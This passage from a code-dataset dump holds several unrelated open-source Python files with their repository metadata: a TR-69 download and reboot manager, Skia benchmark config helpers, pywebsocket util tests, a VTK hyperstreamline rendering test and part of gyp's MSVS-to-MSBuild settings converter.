command_key, file_type, url, username, password, file_size:
target_filename, delay_seconds: as defined in tr-69 Amendment 3
(page 82 of $SPEC)
Raises:
core.ResourcesExceededError: too many simultaneous downloads
core.FileTransferProtocolError: Unsupported URL type, ex: ftp
Returns:
(code, starttime, endtime):
code = status to return (1 == send TransferComplete later, $SPEC pg 85)
starttime, endtime = two floating point numbers in seconds for the
StartTime and CompleteTime of the DownloadResponse.
"""
# TODO(dgentry) check free space?
if len(self._downloads) >= self.MAXDOWNLOADS:
faultstring = 'Max downloads (%d) reached.' % self.MAXDOWNLOADS
raise core.ResourcesExceededError(faultstring)
o = urlparse.urlparse(url)
if o.scheme not in DOWNLOAD_CLIENT:
raise core.FileTransferProtocolError(
'Unsupported URL scheme %s' % o.scheme)
kwargs = dict(command_key=command_key,
file_type=file_type,
url=url,
username=username,
password=password,
file_size=file_size,
target_filename=target_filename,
delay_seconds=delay_seconds,
event_code='M Download')
pobj = persistobj.PersistentObject(objdir=self.config_dir,
rootname=DNLDROOTNAME,
filename=None,
ignore_errors=True,
**kwargs)
dl = DOWNLOADOBJ(stateobj=pobj,
transfer_complete_cb=self.TransferCompleteCallback,
download_dir=self.download_dir)
self._downloads.append(dl)
dl.do_start()
return (1, 0.0, 0.0)
def TransferCompleteCallback(self, dl, command_key, faultcode, faultstring,
starttime, endtime, event_code):
self._downloads.remove(dl)
self._pending_complete.append(dl)
if self.send_transfer_complete:
self.send_transfer_complete(command_key, faultcode, faultstring,
starttime, endtime, event_code)
def RestoreDownloads(self):
pobjs = persistobj.GetPersistentObjects(objdir=self.config_dir,
rootname=DNLDROOTNAME)
for pobj in pobjs:
if not hasattr(pobj, 'command_key'):
print 'Download Object %s has no command_key' % pobj.filename
pobj.Delete()
continue
dl = DOWNLOADOBJ(stateobj=pobj,
transfer_complete_cb=self.TransferCompleteCallback,
download_dir=self.download_dir)
self._downloads.append(dl)
dl.reboot_callback(0, None)
def TransferCompleteResponseReceived(self):
dl = self._pending_complete.pop()
dl.cleanup()
def GetAllQueuedTransfers(self):
transfers = list()
for dl in self._downloads:
transfers.append(dl.get_queue_state())
for dl in self._pending_complete:
transfers.append(dl.get_queue_state())
return transfers
def CancelTransfer(self, command_key):
"""Cancel an in-progress transfer.
Args:
command_key: the command_key to cancel. There can be multiple transfers
with the same command_key. $SPEC says to attempt to cancel all of them,
return failure if any cannot be cancelled.
Raises:
core.CancelNotPermitted: download cannot be cancelled right now.
"""
for dl in self._downloads:
if dl.CommandKey() == command_key:
faultstring = dl.cleanup()
if faultstring:
raise core.CancelNotPermitted(faultstring)
else:
self._downloads.remove(dl)
for dl in self._pending_complete:
if dl.CommandKey() == command_key:
raise core.CancelNotPermitted(
'Installed, awaiting TransferCompleteResponse')
def _DelayedReboot(self):
installer = INSTALLER('')
installer.reboot()
def RestoreReboots(self):
pobjs = persistobj.GetPersistentObjects(objdir=self.config_dir,
rootname=BOOTROOTNAME)
reboots = []
for pobj in pobjs:
if hasattr(pobj, 'command_key'):
reboots.append(('M Reboot', pobj.command_key))
else:
print 'Reboot object %s has no command_key' % pobj.filename
pobj.Delete()
return reboots
def Reboot(self, command_key):
"""Reboot the system."""
kwargs = dict(command_key=command_key)
pobj = persistobj.PersistentObject(objdir=self.config_dir, rootname=BOOTROOTNAME,
filename=None, **kwargs)
self.ioloop.add_callback(self._DelayedReboot)
def _MakeDirsIgnoreError(self, directory):
"""Make sure a directory exists."""
try:
os.makedirs(directory, 0755)
except OSError:
pass
def SetDirectories(self, config_dir, download_dir):
self.config_dir = os.path.join(config_dir, 'state')
self.download_dir = os.path.join(download_dir, 'dnld')
self._MakeDirsIgnoreError(self.config_dir)
self._MakeDirsIgnoreError(self.download_dir)
def main():
# Generate diagram for Download state machine
import subprocess #pylint: disable-msg=C6204
cmd = ['dot', '-Tpdf', '-odownloadStateMachine.pdf']
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
print p.communicate(input=graphviz)[0]
if __name__ == '__main__':
main()
| apache-2.0 | -6,942,379,288,349,571,000 | 34.823077 | 85 | 0.6567 | false |
guorendong/iridium-browser-ubuntu | third_party/skia/tools/bench_pictures_cfg_helper.py | 44 | 3148 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Helper functions to be used in bench_pictures.cfg. """
def Config(**kwargs):
config = {}
for key in kwargs:
config[key] = kwargs[key]
return config
def TileArgs(tile_x, tile_y, timeIndividualTiles=True):
config = {'mode': ['tile', str(tile_x), str(tile_y)]}
if timeIndividualTiles:
config['timeIndividualTiles'] = True
return config
def BitmapConfig(**kwargs):
return Config(config='8888', **kwargs)
def GPUConfig(**kwargs):
return Config(config='gpu', **kwargs)
def TiledBitmapConfig(tile_x, tile_y, timeIndividualTiles=True, **kwargs):
return BitmapConfig(**dict(TileArgs(tile_x, tile_y,
timeIndividualTiles=timeIndividualTiles).items() + kwargs.items()))
def TiledGPUConfig(tile_x, tile_y, **kwargs):
return GPUConfig(**dict(TileArgs(tile_x, tile_y).items() + kwargs.items()))
def TiledConfig(tile_x, tile_y, timeIndividualTiles=True, **kwargs):
return Config(**dict(TileArgs(tile_x, tile_y,
timeIndividualTiles=timeIndividualTiles).items() + kwargs.items()))
def ViewportBitmapConfig(viewport_x, viewport_y, **kwargs):
return BitmapConfig(viewport=[str(viewport_x), str(viewport_y)], **kwargs)
def ViewportGPUConfig(viewport_x, viewport_y, **kwargs):
return GPUConfig(viewport=[str(viewport_x), str(viewport_y)], **kwargs)
def ViewportRTreeConfig(viewport_x, viewport_y, **kwargs):
return RTreeConfig(mode='simple', viewport=[str(viewport_x), str(viewport_y)],
**kwargs)
def ViewportGridConfig(viewport_x, viewport_y, **kwargs):
return GridConfig(viewport_x, viewport_y, mode='simple',
viewport=[str(viewport_x), str(viewport_y)], **kwargs)
def CopyTilesConfig(tile_x, tile_y, **kwargs):
return BitmapConfig(mode=['copyTile', str(tile_x), str(tile_y)], **kwargs)
def RecordConfig(**kwargs):
return BitmapConfig(mode='record', **kwargs)
def PlaybackCreationConfig(**kwargs):
return BitmapConfig(mode='playbackCreation', **kwargs)
def MultiThreadTileConfig(threads, tile_x, tile_y, **kwargs):
return TiledBitmapConfig(tile_x=tile_x, tile_y=tile_y,
timeIndividualTiles=False, multi=str(threads),
**kwargs)
def RTreeConfig(**kwargs):
return BitmapConfig(bbh='rtree', **kwargs)
def GridConfig(tile_x, tile_y, mode, **kwargs):
return BitmapConfig(mode=mode, bbh=['grid', str(tile_x), str(tile_y)],
**kwargs)
def RecordRTreeConfig(**kwargs):
return RTreeConfig(mode='record', **kwargs)
def PlaybackCreationRTreeConfig(**kwargs):
return RTreeConfig(mode='playbackCreation', **kwargs)
def TileRTreeConfig(tile_x, tile_y, **kwargs):
return RTreeConfig(**dict(TileArgs(tile_x, tile_y).items() + kwargs.items()))
def RecordGridConfig(tile_x, tile_y, **kwargs):
return GridConfig(tile_x=tile_x, tile_y=tile_y, mode='record', **kwargs)
def PlaybackCreationGridConfig(tile_x, tile_y, **kwargs):
return GridConfig(tile_x, tile_y, mode='playbackCreation')
| bsd-3-clause | -7,909,050,794,891,284,000 | 28.420561 | 80 | 0.691233 | false |
Syrcon/servo | tests/wpt/web-platform-tests/tools/pywebsocket/src/test/test_util.py | 449 | 7538 | #!/usr/bin/env python
#
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for util module."""
import os
import random
import sys
import unittest
import set_sys_path # Update sys.path to locate mod_pywebsocket module.
from mod_pywebsocket import util
_TEST_DATA_DIR = os.path.join(os.path.split(__file__)[0], 'testdata')
class UtilTest(unittest.TestCase):
"""A unittest for util module."""
def test_get_stack_trace(self):
self.assertEqual('None\n', util.get_stack_trace())
try:
a = 1 / 0 # Intentionally raise exception.
except Exception:
trace = util.get_stack_trace()
self.failUnless(trace.startswith('Traceback'))
self.failUnless(trace.find('ZeroDivisionError') != -1)
def test_prepend_message_to_exception(self):
exc = Exception('World')
self.assertEqual('World', str(exc))
util.prepend_message_to_exception('Hello ', exc)
self.assertEqual('Hello World', str(exc))
def test_get_script_interp(self):
cygwin_path = 'c:\\cygwin\\bin'
cygwin_perl = os.path.join(cygwin_path, 'perl')
self.assertEqual(None, util.get_script_interp(
os.path.join(_TEST_DATA_DIR, 'README')))
self.assertEqual(None, util.get_script_interp(
os.path.join(_TEST_DATA_DIR, 'README'), cygwin_path))
self.assertEqual('/usr/bin/perl -wT', util.get_script_interp(
os.path.join(_TEST_DATA_DIR, 'hello.pl')))
self.assertEqual(cygwin_perl + ' -wT', util.get_script_interp(
os.path.join(_TEST_DATA_DIR, 'hello.pl'), cygwin_path))
def test_hexify(self):
self.assertEqual('61 7a 41 5a 30 39 20 09 0d 0a 00 ff',
util.hexify('azAZ09 \t\r\n\x00\xff'))
class RepeatedXorMaskerTest(unittest.TestCase):
"""A unittest for RepeatedXorMasker class."""
def test_mask(self):
# Sample input e6,97,a5 is U+65e5 in UTF-8
masker = util.RepeatedXorMasker('\xff\xff\xff\xff')
result = masker.mask('\xe6\x97\xa5')
self.assertEqual('\x19\x68\x5a', result)
masker = util.RepeatedXorMasker('\x00\x00\x00\x00')
result = masker.mask('\xe6\x97\xa5')
self.assertEqual('\xe6\x97\xa5', result)
masker = util.RepeatedXorMasker('\xe6\x97\xa5\x20')
result = masker.mask('\xe6\x97\xa5')
self.assertEqual('\x00\x00\x00', result)
def test_mask_twice(self):
masker = util.RepeatedXorMasker('\x00\x7f\xff\x20')
# mask[0], mask[1], ... will be used.
result = masker.mask('\x00\x00\x00\x00\x00')
self.assertEqual('\x00\x7f\xff\x20\x00', result)
# mask[2], mask[0], ... will be used for the next call.
result = masker.mask('\x00\x00\x00\x00\x00')
self.assertEqual('\x7f\xff\x20\x00\x7f', result)
def test_mask_large_data(self):
masker = util.RepeatedXorMasker('mASk')
original = ''.join([chr(i % 256) for i in xrange(1000)])
result = masker.mask(original)
expected = ''.join(
[chr((i % 256) ^ ord('mASk'[i % 4])) for i in xrange(1000)])
self.assertEqual(expected, result)
masker = util.RepeatedXorMasker('MaSk')
first_part = 'The WebSocket Protocol enables two-way communication.'
result = masker.mask(first_part)
self.assertEqual(
'\x19\t6K\x1a\x0418"\x028\x0e9A\x03\x19"\x15<\x08"\rs\x0e#'
'\x001\x07(\x12s\x1f:\x0e~\x1c,\x18s\x08"\x0c>\x1e#\x080\n9'
'\x08<\x05c',
result)
second_part = 'It has two parts: a handshake and the data transfer.'
result = masker.mask(second_part)
self.assertEqual(
"('K%\x00 K9\x16<K=\x00!\x1f>[s\nm\t2\x05)\x12;\n&\x04s\n#"
"\x05s\x1f%\x04s\x0f,\x152K9\x132\x05>\x076\x19c",
result)
def get_random_section(source, min_num_chunks):
chunks = []
bytes_chunked = 0
while bytes_chunked < len(source):
chunk_size = random.randint(
1,
min(len(source) / min_num_chunks, len(source) - bytes_chunked))
chunk = source[bytes_chunked:bytes_chunked + chunk_size]
chunks.append(chunk)
bytes_chunked += chunk_size
return chunks
class InflaterDeflaterTest(unittest.TestCase):
"""A unittest for _Inflater and _Deflater class."""
def test_inflate_deflate_default(self):
input = b'hello' + '-' * 30000 + b'hello'
inflater15 = util._Inflater(15)
deflater15 = util._Deflater(15)
inflater8 = util._Inflater(8)
deflater8 = util._Deflater(8)
compressed15 = deflater15.compress_and_finish(input)
compressed8 = deflater8.compress_and_finish(input)
inflater15.append(compressed15)
inflater8.append(compressed8)
self.assertNotEqual(compressed15, compressed8)
self.assertEqual(input, inflater15.decompress(-1))
self.assertEqual(input, inflater8.decompress(-1))
def test_random_section(self):
random.seed(a=0)
source = ''.join(
[chr(random.randint(0, 255)) for i in xrange(100 * 1024)])
chunked_input = get_random_section(source, 10)
print "Input chunk sizes: %r" % [len(c) for c in chunked_input]
deflater = util._Deflater(15)
compressed = []
for chunk in chunked_input:
compressed.append(deflater.compress(chunk))
compressed.append(deflater.compress_and_finish(''))
chunked_expectation = get_random_section(source, 10)
print ("Expectation chunk sizes: %r" %
[len(c) for c in chunked_expectation])
inflater = util._Inflater(15)
inflater.append(''.join(compressed))
for chunk in chunked_expectation:
decompressed = inflater.decompress(len(chunk))
self.assertEqual(chunk, decompressed)
self.assertEqual('', inflater.decompress(-1))
if __name__ == '__main__':
unittest.main()
# vi:sts=4 sw=4 et
| mpl-2.0 | 4,311,689,035,217,643,000 | 36.69 | 76 | 0.640356 | false |
sankhesh/VTK | Filters/Modeling/Testing/Python/Hyper.py | 9 | 5170 | #!/usr/bin/env python
import os
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Create the RenderWindow, Renderer and interactive renderer
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.SetMultiSamples(0)
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
VTK_INTEGRATE_BOTH_DIRECTIONS = 2
#
# generate tensors
ptLoad = vtk.vtkPointLoad()
ptLoad.SetLoadValue(100.0)
ptLoad.SetSampleDimensions(20, 20, 20)
ptLoad.ComputeEffectiveStressOn()
ptLoad.SetModelBounds(-10, 10, -10, 10, -10, 10)
#
# If the current directory is writable, then test the writers
#
try:
channel = open("wSP.vtk", "wb")
channel.close()
wSP = vtk.vtkDataSetWriter()
wSP.SetInputConnection(ptLoad.GetOutputPort())
wSP.SetFileName("wSP.vtk")
wSP.SetTensorsName("pointload")
wSP.SetScalarsName("effective_stress")
wSP.Write()
rSP = vtk.vtkDataSetReader()
rSP.SetFileName("wSP.vtk")
rSP.SetTensorsName("pointload")
rSP.SetScalarsName("effective_stress")
rSP.Update()
input = rSP.GetOutput()
# cleanup
#
try:
os.remove("wSP.vtk")
except OSError:
pass
except IOError:
print("Unable to test the writer/reader.")
input = ptLoad.GetOutput()
# Generate hyperstreamlines
s1 = vtk.vtkHyperStreamline()
s1.SetInputData(input)
s1.SetStartPosition(9, 9, -9)
s1.IntegrateMinorEigenvector()
s1.SetMaximumPropagationDistance(18.0)
s1.SetIntegrationStepLength(0.1)
s1.SetStepLength(0.01)
s1.SetRadius(0.25)
s1.SetNumberOfSides(18)
s1.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)
s1.Update()
# Map hyperstreamlines
lut = vtk.vtkLogLookupTable()
lut.SetHueRange(.6667, 0.0)
s1Mapper = vtk.vtkPolyDataMapper()
s1Mapper.SetInputConnection(s1.GetOutputPort())
s1Mapper.SetLookupTable(lut)
# force update for scalar range
ptLoad.Update()
s1Mapper.SetScalarRange(ptLoad.GetOutput().GetScalarRange())
s1Actor = vtk.vtkActor()
s1Actor.SetMapper(s1Mapper)
s2 = vtk.vtkHyperStreamline()
s2.SetInputData(input)
s2.SetStartPosition(-9, -9, -9)
s2.IntegrateMinorEigenvector()
s2.SetMaximumPropagationDistance(18.0)
s2.SetIntegrationStepLength(0.1)
s2.SetStepLength(0.01)
s2.SetRadius(0.25)
s2.SetNumberOfSides(18)
s2.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)
s2.Update()
s2Mapper = vtk.vtkPolyDataMapper()
s2Mapper.SetInputConnection(s2.GetOutputPort())
s2Mapper.SetLookupTable(lut)
s2Mapper.SetScalarRange(input.GetScalarRange())
s2Actor = vtk.vtkActor()
s2Actor.SetMapper(s2Mapper)
s3 = vtk.vtkHyperStreamline()
s3.SetInputData(input)
s3.SetStartPosition(9, -9, -9)
s3.IntegrateMinorEigenvector()
s3.SetMaximumPropagationDistance(18.0)
s3.SetIntegrationStepLength(0.1)
s3.SetStepLength(0.01)
s3.SetRadius(0.25)
s3.SetNumberOfSides(18)
s3.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)
s3.Update()
s3Mapper = vtk.vtkPolyDataMapper()
s3Mapper.SetInputConnection(s3.GetOutputPort())
s3Mapper.SetLookupTable(lut)
s3Mapper.SetScalarRange(input.GetScalarRange())
s3Actor = vtk.vtkActor()
s3Actor.SetMapper(s3Mapper)
s4 = vtk.vtkHyperStreamline()
s4.SetInputData(input)
s4.SetStartPosition(-9, 9, -9)
s4.IntegrateMinorEigenvector()
s4.SetMaximumPropagationDistance(18.0)
s4.SetIntegrationStepLength(0.1)
s4.SetStepLength(0.01)
s4.SetRadius(0.25)
s4.SetNumberOfSides(18)
s4.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)
s4.Update()
s4Mapper = vtk.vtkPolyDataMapper()
s4Mapper.SetInputConnection(s4.GetOutputPort())
s4Mapper.SetLookupTable(lut)
s4Mapper.SetScalarRange(input.GetScalarRange())
s4Actor = vtk.vtkActor()
s4Actor.SetMapper(s4Mapper)
# plane for context
#
g = vtk.vtkImageDataGeometryFilter()
g.SetInputData(input)
g.SetExtent(0, 100, 0, 100, 0, 0)
g.Update()
# for scalar range
gm = vtk.vtkPolyDataMapper()
gm.SetInputConnection(g.GetOutputPort())
gm.SetScalarRange(g.GetOutput().GetScalarRange())
ga = vtk.vtkActor()
ga.SetMapper(gm)
# Create outline around data
#
outline = vtk.vtkOutlineFilter()
outline.SetInputData(input)
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
outlineActor.GetProperty().SetColor(0, 0, 0)
# Create cone indicating application of load
#
coneSrc = vtk.vtkConeSource()
coneSrc.SetRadius(.5)
coneSrc.SetHeight(2)
coneMap = vtk.vtkPolyDataMapper()
coneMap.SetInputConnection(coneSrc.GetOutputPort())
coneActor = vtk.vtkActor()
coneActor.SetMapper(coneMap)
coneActor.SetPosition(0, 0, 11)
coneActor.RotateY(90)
coneActor.GetProperty().SetColor(1, 0, 0)
camera = vtk.vtkCamera()
camera.SetFocalPoint(0.113766, -1.13665, -1.01919)
camera.SetPosition(-29.4886, -63.1488, 26.5807)
camera.SetViewAngle(24.4617)
camera.SetViewUp(0.17138, 0.331163, 0.927879)
camera.SetClippingRange(1, 100)
ren1.AddActor(s1Actor)
ren1.AddActor(s2Actor)
ren1.AddActor(s3Actor)
ren1.AddActor(s4Actor)
ren1.AddActor(outlineActor)
ren1.AddActor(coneActor)
ren1.AddActor(ga)
ren1.SetBackground(1.0, 1.0, 1.0)
ren1.SetActiveCamera(camera)
renWin.SetSize(300, 300)
renWin.Render()
iren.Initialize()
#iren.Start()
| bsd-3-clause | 7,975,878,100,125,013,000 | 23.386792 | 61 | 0.776402 | false |
sss-freshbyte/blog | node_modules/node-gyp/gyp/pylib/gyp/MSVSSettings.py | 1361 | 45045 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
r"""Code to validate and convert settings of the Microsoft build tools.
This file contains code to validate and convert settings of the Microsoft
build tools. The function ConvertToMSBuildSettings(), ValidateMSVSSettings(),
and ValidateMSBuildSettings() are the entry points.
This file was created by comparing the projects created by Visual Studio 2008
and Visual Studio 2010 for all available settings through the user interface.
The MSBuild schemas were also considered. They are typically found in the
MSBuild install directory, e.g. c:\Program Files (x86)\MSBuild
"""
import sys
import re
# Dictionaries of settings validators. The key is the tool name, the value is
# a dictionary mapping setting names to validation functions.
_msvs_validators = {}
_msbuild_validators = {}
# A dictionary of settings converters. The key is the tool name, the value is
# a dictionary mapping setting names to conversion functions.
_msvs_to_msbuild_converters = {}
# Tool name mapping from MSVS to MSBuild.
_msbuild_name_of_tool = {}
class _Tool(object):
"""Represents a tool used by MSVS or MSBuild.
Attributes:
msvs_name: The name of the tool in MSVS.
msbuild_name: The name of the tool in MSBuild.
"""
def __init__(self, msvs_name, msbuild_name):
self.msvs_name = msvs_name
self.msbuild_name = msbuild_name
def _AddTool(tool):
"""Adds a tool to the four dictionaries used to process settings.
This only defines the tool. Each setting also needs to be added.
Args:
tool: The _Tool object to be added.
"""
_msvs_validators[tool.msvs_name] = {}
_msbuild_validators[tool.msbuild_name] = {}
_msvs_to_msbuild_converters[tool.msvs_name] = {}
_msbuild_name_of_tool[tool.msvs_name] = tool.msbuild_name
def _GetMSBuildToolSettings(msbuild_settings, tool):
"""Returns an MSBuild tool dictionary. Creates it if needed."""
return msbuild_settings.setdefault(tool.msbuild_name, {})
class _Type(object):
"""Type of settings (Base class)."""
def ValidateMSVS(self, value):
"""Verifies that the value is legal for MSVS.
Args:
value: the value to check for this type.
Raises:
ValueError if value is not valid for MSVS.
"""
def ValidateMSBuild(self, value):
"""Verifies that the value is legal for MSBuild.
Args:
value: the value to check for this type.
Raises:
ValueError if value is not valid for MSBuild.
"""
def ConvertToMSBuild(self, value):
"""Returns the MSBuild equivalent of the MSVS value given.
Args:
value: the MSVS value to convert.
Returns:
the MSBuild equivalent.
Raises:
ValueError if value is not valid.
"""
return value
class _String(_Type):
"""A setting that's just a string."""
def ValidateMSVS(self, value):
if not isinstance(value, basestring):
raise ValueError('expected string; got %r' % value)
def ValidateMSBuild(self, value):
if not isinstance(value, basestring):
raise ValueError('expected string; got %r' % value)
def ConvertToMSBuild(self, value):
# Convert the macros
return ConvertVCMacrosToMSBuild(value)
class _StringList(_Type):
"""A settings that's a list of strings."""
def ValidateMSVS(self, value):
if not isinstance(value, basestring) and not isinstance(value, list):
raise ValueError('expected string list; got %r' % value)
def ValidateMSBuild(self, value):
if not isinstance(value, basestring) and not isinstance(value, list):
raise ValueError('expected string list; got %r' % value)
def ConvertToMSBuild(self, value):
# Convert the macros
if isinstance(value, list):
return [ConvertVCMacrosToMSBuild(i) for i in value]
else:
return ConvertVCMacrosToMSBuild(value)
class _Boolean(_Type):
"""Boolean settings, can have the values 'false' or 'true'."""
def _Validate(self, value):
if value != 'true' and value != 'false':
raise ValueError('expected bool; got %r' % value)
def ValidateMSVS(self, value):
self._Validate(value)
def ValidateMSBuild(self, value):
self._Validate(value)
def ConvertToMSBuild(self, value):
self._Validate(value)
return value
class _Integer(_Type):
"""Integer settings."""
def __init__(self, msbuild_base=10):
_Type.__init__(self)
self._msbuild_base = msbuild_base
def ValidateMSVS(self, value):
# Try to convert, this will raise ValueError if invalid.
self.ConvertToMSBuild(value)
def ValidateMSBuild(self, value):
# Try to convert, this will raise ValueError if invalid.
int(value, self._msbuild_base)
def ConvertToMSBuild(self, value):
msbuild_format = (self._msbuild_base == 10) and '%d' or '0x%04x'
return msbuild_format % int(value)
class _Enumeration(_Type):
"""Type of settings that is an enumeration.
In MSVS, the values are indexes like '0', '1', and '2'.
MSBuild uses text labels that are more representative, like 'Win32'.
Constructor args:
label_list: an array of MSBuild labels that correspond to the MSVS index.
In the rare cases where MSVS has skipped an index value, None is
used in the array to indicate the unused spot.
new: an array of labels that are new to MSBuild.
"""
def __init__(self, label_list, new=None):
_Type.__init__(self)
self._label_list = label_list
self._msbuild_values = set(value for value in label_list
if value is not None)
if new is not None:
self._msbuild_values.update(new)
def ValidateMSVS(self, value):
# Try to convert. It will raise an exception if not valid.
self.ConvertToMSBuild(value)
def ValidateMSBuild(self, value):
if value not in self._msbuild_values:
raise ValueError('unrecognized enumerated value %s' % value)
def ConvertToMSBuild(self, value):
index = int(value)
if index < 0 or index >= len(self._label_list):
raise ValueError('index value (%d) not in expected range [0, %d)' %
(index, len(self._label_list)))
label = self._label_list[index]
if label is None:
raise ValueError('converted value for %s not specified.' % value)
return label
# Instantiate the various generic types.
_boolean = _Boolean()
_integer = _Integer()
# For now, we don't do any special validation on these types:
_string = _String()
_file_name = _String()
_folder_name = _String()
_file_list = _StringList()
_folder_list = _StringList()
_string_list = _StringList()
# Some boolean settings went from numerical values to boolean. The
# mapping is 0: default, 1: false, 2: true.
_newly_boolean = _Enumeration(['', 'false', 'true'])
def _Same(tool, name, setting_type):
"""Defines a setting that has the same name in MSVS and MSBuild.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
name: the name of the setting.
setting_type: the type of this setting.
"""
_Renamed(tool, name, name, setting_type)
def _Renamed(tool, msvs_name, msbuild_name, setting_type):
"""Defines a setting for which the name has changed.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
msvs_name: the name of the MSVS setting.
msbuild_name: the name of the MSBuild setting.
setting_type: the type of this setting.
"""
def _Translate(value, msbuild_settings):
msbuild_tool_settings = _GetMSBuildToolSettings(msbuild_settings, tool)
msbuild_tool_settings[msbuild_name] = setting_type.ConvertToMSBuild(value)
_msvs_validators[tool.msvs_name][msvs_name] = setting_type.ValidateMSVS
_msbuild_validators[tool.msbuild_name][msbuild_name] = (
setting_type.ValidateMSBuild)
_msvs_to_msbuild_converters[tool.msvs_name][msvs_name] = _Translate
def _Moved(tool, settings_name, msbuild_tool_name, setting_type):
_MovedAndRenamed(tool, settings_name, msbuild_tool_name, settings_name,
setting_type)
def _MovedAndRenamed(tool, msvs_settings_name, msbuild_tool_name,
msbuild_settings_name, setting_type):
"""Defines a setting that may have moved to a new section.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
msvs_settings_name: the MSVS name of the setting.
msbuild_tool_name: the name of the MSBuild tool to place the setting under.
msbuild_settings_name: the MSBuild name of the setting.
setting_type: the type of this setting.
"""
def _Translate(value, msbuild_settings):
tool_settings = msbuild_settings.setdefault(msbuild_tool_name, {})
tool_settings[msbuild_settings_name] = setting_type.ConvertToMSBuild(value)
_msvs_validators[tool.msvs_name][msvs_settings_name] = (
setting_type.ValidateMSVS)
validator = setting_type.ValidateMSBuild
_msbuild_validators[msbuild_tool_name][msbuild_settings_name] = validator
_msvs_to_msbuild_converters[tool.msvs_name][msvs_settings_name] = _Translate
def _MSVSOnly(tool, name, setting_type):
"""Defines a setting that is only found in MSVS.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
name: the name of the setting.
setting_type: the type of this setting.
"""
def _Translate(unused_value, unused_msbuild_settings):
# Since this is for MSVS only settings, no translation will happen.
pass
_msvs_validators[tool.msvs_name][name] = setting_type.ValidateMSVS
_msvs_to_msbuild_converters[tool.msvs_name][name] = _Translate
def _MSBuildOnly(tool, name, setting_type):
"""Defines a setting that is only found in MSBuild.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
name: the name of the setting.
setting_type: the type of this setting.
"""
def _Translate(value, msbuild_settings):
# Let msbuild-only properties get translated as-is from msvs_settings.
tool_settings = msbuild_settings.setdefault(tool.msbuild_name, {})
tool_settings[name] = value
_msbuild_validators[tool.msbuild_name][name] = setting_type.ValidateMSBuild
_msvs_to_msbuild_converters[tool.msvs_name][name] = _Translate
def _ConvertedToAdditionalOption(tool, msvs_name, flag):
"""Defines a setting that's handled via a command line option in MSBuild.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
msvs_name: the name of the MSVS setting that if 'true' becomes a flag
flag: the flag to insert at the end of the AdditionalOptions
"""
def _Translate(value, msbuild_settings):
if value == 'true':
tool_settings = _GetMSBuildToolSettings(msbuild_settings, tool)
if 'AdditionalOptions' in tool_settings:
new_flags = '%s %s' % (tool_settings['AdditionalOptions'], flag)
else:
new_flags = flag
tool_settings['AdditionalOptions'] = new_flags
_msvs_validators[tool.msvs_name][msvs_name] = _boolean.ValidateMSVS
_msvs_to_msbuild_converters[tool.msvs_name][msvs_name] = _Translate
def _CustomGeneratePreprocessedFile(tool, msvs_name):
def _Translate(value, msbuild_settings):
tool_settings = _GetMSBuildToolSettings(msbuild_settings, tool)
if value == '0':
tool_settings['PreprocessToFile'] = 'false'
tool_settings['PreprocessSuppressLineNumbers'] = 'false'
elif value == '1': # /P
tool_settings['PreprocessToFile'] = 'true'
tool_settings['PreprocessSuppressLineNumbers'] = 'false'
elif value == '2': # /EP /P
tool_settings['PreprocessToFile'] = 'true'
tool_settings['PreprocessSuppressLineNumbers'] = 'true'
else:
raise ValueError('value must be one of [0, 1, 2]; got %s' % value)
# Create a bogus validator that looks for '0', '1', or '2'
msvs_validator = _Enumeration(['a', 'b', 'c']).ValidateMSVS
_msvs_validators[tool.msvs_name][msvs_name] = msvs_validator
msbuild_validator = _boolean.ValidateMSBuild
msbuild_tool_validators = _msbuild_validators[tool.msbuild_name]
msbuild_tool_validators['PreprocessToFile'] = msbuild_validator
